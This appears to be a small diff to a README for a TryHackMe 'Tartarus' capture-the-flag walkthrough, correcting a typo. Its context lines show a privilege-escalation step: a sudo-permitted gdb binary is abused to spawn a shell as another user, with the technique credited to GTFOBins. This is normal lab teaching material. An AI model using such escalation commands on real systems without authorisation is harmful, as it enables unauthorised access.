FrancescoGrazioso/TryHackMe_Tartarus/README.md

 sudo -l
 ```

-You can see that gdb is runnable wothout password, use GTFOBins (grat site!) to escalate.
+You can see that gdb is runnable wothout password, use GTFOBins (great site!) to escalate.

 ```
 sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit